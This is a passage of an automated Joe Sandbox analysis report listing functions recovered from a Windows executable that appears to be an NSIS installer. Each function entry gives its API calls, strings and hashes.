Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
Instruction ID: 5e506215f2711f0e24a615dbcf2ef03c94eb3d964d91be164e4c0db9e35754d2
Opcode Fuzzy Hash: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
Instruction Fuzzy Hash: 80D012315141206FD34017386E4C88B7A68AF063303314B36F4A6F12E0C634CC3786ED

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,?), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNEL32(?,0084A0B0,?,000000E6,0040F0D0,?,?,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

SetFileAttributes: "%s":%08X, xrefs: 0040177B
BringToFront, xrefs: 004016BD
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Jump: %d, xrefs: 00401602
Rename: %s, xrefs: 004018F8
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Aborting: "%s", xrefs: 0040161D
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Call: %d, xrefs: 0040165A
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: "%s" (%d), xrefs: 004017BF
Sleep(%d), xrefs: 0040169D
SetFileAttributes failed., xrefs: 004017A1
detailprint: %s, xrefs: 00401679
Rename failed: %s, xrefs: 0040194B
Rename on reboot: %s, xrefs: 00401943

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: 99a3929af74f4417753e4645e0c6c0516a132660515c9950466baffe7fed2d18
Instruction ID: 748122a4b1e4c8b0444bddd0dc60868c48b22d194fcfef730b64eaf2fe916135
Opcode Fuzzy Hash: 99a3929af74f4417753e4645e0c6c0516a132660515c9950466baffe7fed2d18
Instruction Fuzzy Hash: 3CB1D172A01204EFDB107FA1DD459AE3B78EF05354B25817FF942B62E1DA3D8A40CA6D

Function 00405942 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D

lstrcatW.KERNEL32(008520C0,007C5A78), ref: 004059C4
lstrlenW.KERNEL32(007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000,00000006,008420A0), ref: 00405A46
lstrcmpiW.KERNEL32(007E0D58,.exe,007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000), ref: 00405A59
GetFileAttributesW.KERNEL32(007E0D60), ref: 00405A64

Part of subcall function 00405F67: wsprintfW.USER32 ref: 00405F74

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,008460A8), ref: 00405ACD
RegisterClassW.USER32(007E9580), ref: 00405B20
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B38
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B71

Part of subcall function 00403EAB: SetWindowTextW.USER32(00000000,007E95E0), ref: 00403F46

ShowWindow.USER32(00000005,00000000), ref: 00405BA7
LoadLibraryW.KERNEL32(RichEd20), ref: 00405BB8
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BC3
GetClassInfoW.USER32(00000000,RichEdit20A,007E9580), ref: 00405BD3
GetClassInfoW.USER32(00000000,RichEdit,007E9580), ref: 00405BE0
RegisterClassW.USER32(007E9580), ref: 00405BE9
DialogBoxParamW.USER32(?,00000000,0040548F,00000000), ref: 00405C08

Strings

_Nb, xrefs: 00405AE7
xZ|, xrefs: 0040597B
b~, xrefs: 00405A35
`~, xrefs: 00405A0C
RichEd32, xrefs: 00405BBE
.DEFAULT\Control Panel\International, xrefs: 004059AF
.exe, xrefs: 00405A53
RichEd20, xrefs: 00405BB3
Control Panel\Desktop\ResourceLocale, xrefs: 00405988
RichEdit20A, xrefs: 00405BCC, 00405BD1
RichEdit, xrefs: 00405BDA

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$`~$b~$xZ|
API String ID: 608394941-1309837594
Opcode ID: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
Instruction ID: f5a039cb880b9eaee1ecdf0536d3c824aabf016c99065ad96b2918c6fc8c0824
Opcode Fuzzy Hash: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
Instruction Fuzzy Hash: 0A718071600605AED710ABA5AD85E3B37ACEB84748F00413EF941B62E2DB7C5C51CE6D

Function 0040359D Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035AE
GetModuleFileNameW.KERNEL32(00000000,0085E0D8,00002004,?,?,?,00000000,00403A5D,?), ref: 004035CA

Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C

GetFileSize.KERNEL32(00000000,00000000,008620E0,00000000,0084E0B8,0084E0B8,0085E0D8,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00403616

Strings

Inst, xrefs: 00403682
Null, xrefs: 00403694
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037DB
Error launching installer, xrefs: 004035ED
soft, xrefs: 0040368B

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
Instruction ID: 2d5e6ab7a624250aa0c4fc4e0edfbfc1f0b135b6de304195c1858c8edc22daf3
Opcode Fuzzy Hash: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
Instruction Fuzzy Hash: A151B5B1900204ABDB209F65DD85BAE7FACEB04756F14853BEA00B72D1D73D9A44CB5C

Function 0040337F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033EB
GetTickCount.KERNEL32 ref: 0040346E
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 0040349B
wsprintfW.USER32 ref: 004034AE
WriteFile.KERNELBASE(00000000,00000000,00428550,0040377C,00000000), ref: 004034DF
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040355C

Strings

... %d%%, xrefs: 004034A8
P1B, xrefs: 004033AB

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B
API String ID: 651206458-1497722
Opcode ID: 18372cb804754b34bf2e2d58d5ea3eaed026bf3a7fa6db410709b4b609b292b8
Instruction ID: fe8561038ca0c1f851d54235c72d98e4424113abdfb89388266e227e9cd06809
Opcode Fuzzy Hash: 18372cb804754b34bf2e2d58d5ea3eaed026bf3a7fa6db410709b4b609b292b8
Instruction Fuzzy Hash: E8617B7190021AEBCF10DF65E9846AF7BA8AB04316F14453BF905B6290DB789F50CBA9

Function 00405E95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EB3
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403814,008520C0,008560C8), ref: 00405ECE

Strings

nsa, xrefs: 00405EA2

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: fc3ef10fc4e670788618d569d9e14e1d65dd7a664a0663973dbebc503530dd57
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: C9F09675610604BBDB10CF59DD05A9FBBADEF94710F10803BEA45E7150E6B09E44C758

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
Instruction ID: 4a7c6b10ca187eba816588ea1d9201846d19603f0f5fc62a4a658fec9e55caff
Opcode Fuzzy Hash: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
Instruction Fuzzy Hash: 22F0F432A10220DBDB165B349D44B263698AB44750F68863BF911FA2F1D67CCC128B5C

Function 00405E66 Relevance: 3.0, APIs: 2, Instructions: 15
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E46 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,00406E97,?,?,?), ref: 00405E4A
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E5D

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: bfdd682a7b15487adc9015e6c601711f35dcdd947f77102e263bd76fd4388c72
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: C1C01271404800AAC6010B34DF0881A7A26AB90370B298B3AB0BAE00F0CB3088A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037E2 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040604E: CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
Part of subcall function 0040604E: CharNextW.USER32(?,?,?,00000000), ref: 004060C0
Part of subcall function 0040604E: CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
Part of subcall function 0040604E: CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9

CreateDirectoryW.KERNELBASE(008560C8,00000000,008560C8,008560C8,008560C8,-00000002,00403A21), ref: 00403803

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
Instruction ID: b75284c5955f365d0d9c4c727e495e4f3aae82af695c09dbce3dc5899ee9d583
Opcode Fuzzy Hash: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
Instruction Fuzzy Hash: CBD0C751143D3061D5A1336A7D06FCF0D4DAF5271AB06407BF945B71C29E7C065A45FE

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403770,?,?,?,?,00000000,00403A5D,?), ref: 00403376

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: FilePointer
String ID:
